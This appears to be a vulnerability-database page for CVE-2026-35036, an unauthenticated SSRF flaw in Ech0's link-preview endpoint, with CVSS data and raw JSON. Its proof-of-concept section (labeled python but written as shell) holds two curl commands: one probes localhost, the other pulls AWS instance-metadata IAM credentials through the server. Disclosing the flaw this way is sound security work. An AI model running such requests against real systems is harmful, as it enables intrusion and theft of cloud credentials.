Security Vulnerability Report
中文
CVE-2026-35036 CVSS 7.5 HIGH

CVE-2026-35036

Published: 2026-04-06 17:17:13
Last Modified: 2026-04-14 19:58:33
Source: [email protected]

Description

Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to 4.2.8, Ech0 implements link preview (editor fetches a page title) through GET /api/website/title. That is legitimate product behavior, but the implementation is unsafe: the route is unauthenticated, accepts a fully attacker-controlled URL, performs a server-side GET, reads the entire response body into memory (io.ReadAll). There is no host allowlist, no SSRF filter, and InsecureSkipVerify: true on the outbound client. Anyone who can reach the instance can force the Ech0 server to open HTTP/HTTPS URLs of their choice as seen from the server’s network position (Docker bridge, VPC, localhost from the process view). This vulnerability is fixed in 4.2.8.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:* - VULNERABLE
Ech0 < 4.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC to test for SSRF by targeting localhost # Replace <target_ip> with the actual IP of the vulnerable Ech0 instance curl -X GET "http://<target_ip>/api/website/title?url=http://127.0.0.1:80" -v # PoC to attempt to fetch cloud metadata (e.g., AWS) curl -X GET "http://<target_ip>/api/website/title?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/" -v

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35036", "sourceIdentifier": "[email protected]", "published": "2026-04-06T17:17:12.940", "lastModified": "2026-04-14T19:58:33.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to 4.2.8, Ech0 implements link preview (editor fetches a page title) through GET /api/website/title. That is legitimate product behavior, but the implementation is unsafe: the route is unauthenticated, accepts a fully attacker-controlled URL, performs a server-side GET, reads the entire response body into memory (io.ReadAll). There is no host allowlist, no SSRF filter, and InsecureSkipVerify: true on the outbound client. Anyone who can reach the instance can force the Ech0 server to open HTTP/HTTPS URLs of their choice as seen from the server’s network position (Docker bridge, VPC, localhost from the process view). This vulnerability is fixed in 4.2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.8", "matchCriteriaId": "9571E0F6-6EAF-4AFD-AE06-4E579DFE798A"}]}]}], "references": [{"url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-wc4h-2348-jc3p", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-wc4h-2348-jc3p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.